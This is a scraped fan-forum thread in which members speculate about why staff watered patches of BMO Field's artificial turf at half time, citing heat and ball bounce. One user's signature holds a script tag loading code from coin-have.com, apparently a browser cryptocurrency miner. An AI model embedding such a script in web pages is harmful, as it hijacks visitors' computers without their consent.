RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Question ASG: Watering Portions of the Pitch a Half Time?

Please enlighten me.
    "Failure simply isn't an option at this stage. TFC pushed its chips to the middle of the table when it splurged on Bradley and Defoe and reinforced its bet by making savvy acquisitions elsewhere. This collection of players is capable of delivering on the promises made during the close season. There are no more excuses available for TFC. Only success will continue the process of atoning for the past and establishing a higher standard for the future." FOX Sports

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

My bet is to soften it up for Becks and gang.

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Maybe. But it had been rained on 3 hours earlier and they only flooded 2 specific areas of the pitch.
    "Failure simply isn't an option at this stage. TFC pushed its chips to the middle of the table when it splurged on Bradley and Defoe and reinforced its bet by making savvy acquisitions elsewhere. This collection of players is capable of delivering on the promises made during the close season. There are no more excuses available for TFC. Only success will continue the process of atoning for the past and establishing a higher standard for the future." FOX Sports

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

maybe they told the west ham guys it was real grass?
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I was told by someone close to the club that they do this to lower the temperature of the pitch. The rubber apparently gets really hot all day and takes a long time to cool????? What I don't understand is why they did it for this game after it rained and so late in the evening.

At the San Jose game they had watered the whole thing... I guess here in Canada we can't avoid flodding the playing surface. Maybe next year we'll see a Zamboni out at half!

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by br_aguilar View Post
    maybe they told the west ham guys it was real grass?

....and earlier in the day when WHU were watching they went over it with a lawn mower.

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFCFan1977 View Post
    I was told by someone close to the club that they do this to lower the temperature of the pitch. The rubber apparently gets really hot all day and takes a long time to cool????? What I don't understand is why they did it for this game after it rained and so late in the evening.

At the San Jose game they had watered the whole thing... I guess here in Canada we can't avoid flodding the playing surface. Maybe next year we'll see a Zamboni out at half!
    Greeeeat. More ammo for the the real grass movement.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by DOMIN8R View Post
    Greeeeat. More ammo for the the real grass movement.

I thought it sounded crazy, but that's what I was told! I guess they do have the budget to water a real pitch!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

No, it's not crazy at all. I played on BMO at 3pm on a Sunday afternoon where it was 30+ degrees out. Within 5 mins my feet were literally burning.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Shaughno View Post
    No, it's not crazy at all. I played on BMO at 3pm on a Sunday afternoon where it was 30+ degrees out. Within 5 mins my feet were literally burning.

That's only cause you so damn fast!!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Marvell Wynne ain't got shit on me!

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Turf when hot is much slower than real grass,watering the turf ball bounce and move similar as on real grass.
    Great love does not exist without joy and without great suffering ,that's why One club is worth only as much as its fans !

RPB Member
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Thank you folks. And that conlcudes this weeks episode of BMO Field Quirks and Quarks.

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Watering the pitch was to trick potential strikers into thinking we have real grass…
    “We changed the entire league’s opinion of the viability of soccer in North America. And then we blew it because we chickened out." —Tim Leiweke

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Shaughno View Post

That was a crazy day ... I can't believe how hot it was on the field.
    The heat was literally coming up in waves from below.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I secretly threw down grass seed yesterday. Bwahahahaha

Field turf problem should be solved in about 10 days.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by denime View Post
    Turf when hot is much slower than real grass,watering the turf ball bounce and move similar as on real grass.
    I think this is the real reason, its done in other places, because the rubber grips better than real grass you get an un-natural bounce, when you water the field turf you get a more natural bounce.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

yeah i saw that too.... i figured there was an unpleasant shit scrape somewhere.

really, watering rubber and plastic? c'mon. get some fucking grass already.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

When I saw someone watering the plastic pitch, I thought it was a cruel joke.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFCFan1977 View Post

It does, when i play on the Iceland and Hershey Center fields, the bottoms of your feet BURN on a hot day.